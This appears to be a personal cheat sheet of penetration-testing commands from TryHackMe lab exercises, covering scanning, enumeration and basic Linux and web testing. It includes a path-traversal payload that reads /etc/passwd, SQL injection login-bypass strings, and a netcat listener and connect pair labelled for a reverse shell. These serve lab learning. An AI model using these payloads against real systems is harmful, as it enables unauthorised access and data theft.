TryHackMe Pentest Notes
Commands and quick notes from TryHackMe pentest labs
Quick Navigation
Enumeration
nMap Full TCP Port Scan (Stealth)
Scan all TCP ports using a stealth SYN scan.
-sS SYN scan; -Pn no ping; -T4 faster timing; -p- all ports.
nmap -sS -Pn -T4 -p- target-ip
nMap Service and Version Detection
Detect services, versions, and default scripts on common ports.
-sV service/version detection; -sC default scripts; -T4 faster timing; -p port list.
nmap -sV -sC -T4 -p 22,80,443,etc target-ip
Curl Basic Web Request
Fetch headers or verbose output from a web server.
-I headers only; -v verbose output; -k allows insecure HTTPS.
curl -I target-ip
curl -v target-ip
Gobuster Directory Bruteforce
Bruteforce directories and files on a web server.
-u target URL; -w wordlist path; -x file extensions.
gobuster dir -u http://target-ip/ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,txt
Nikto Web Vulnerability Scanner
Scan a web server for common misconfigurations and known issues.
-h sets the target host.
nikto -h target-ip
Netcat Banner Grab
Connect to a service and capture its banner.
-n no DNS; -v verbose output.
nc -nv target-ip port
Dig a
Query DNS records for a domain.
dig (a aaa mx txt cname ns soa)
+dig mx website.com
Registrar Lookup
Check domain registration and ownership information.
whois website.com
Download Files
Download a file from a URL.
wget url
Web
Common Paths
Check common web paths that may expose files or metadata.
/assets, /robots.txt
File Inclusion / Path Traversal
Test for local file inclusion or traversal via a vulnerable parameter.
http://target-ip/?page=../../../../etc/passwd
Windows AD
RDP to AD (Creds Domain\username)
Connect to a Windows host over RDP.
/v: sets the target host.
mstsc /v:target-ip
Linux
Give Executable Permissions
Make a script executable for the current user.
+x adds execute permission.
chmod +x script.sh
Run Program
Execute a local binary or script from the current directory.
./programname
Find .txt Files
Search the filesystem for text files.
-type f files only; -name pattern match; 2>/dev/null hides permission errors.
find / -type f -name "*.txt" 2>/dev/null
View Sudo Permissions
List commands the current user can run with sudo.
-l lists permitted commands.
sudo -l
See Files in Directories
List directory contents with elevated permissions.
sudo ls ../../../*
SQL Injection
Bypass Login (Always True)
Classic SQLi payload to make a WHERE clause always true.
' OR '1'='1
Login as Admin
Payload to end the string and comment out the rest.
admin' --
Comment Out Rest of Query
Append a SQL comment to ignore the remainder of the query.
' OR '1'='1' --
MySQL Comment Variant
Alternate comment syntax for MySQL.
admin' #
Python
Install Package
Install a Python package with pip.
pip install pymodbus
Run Script
Run a Python script with Python 3.
python3 filename.py
ETC
Steganography Extract
Extract hidden data from a file.
-sf sets the stego file.
steghide extract -sf cover.jpg
TCPdump
Capture packets on a network interface.
-i selects the interface.
tcpdump -i any
Netcat Listener (Attacker)
Open a listening socket for a reverse shell.
-l listen mode; -v verbose; -n no DNS; -p local port.
nc -lvnp 4444
Netcat Connect (Victim)
Connect to a listener on the attacker host.
nc target-ip 4444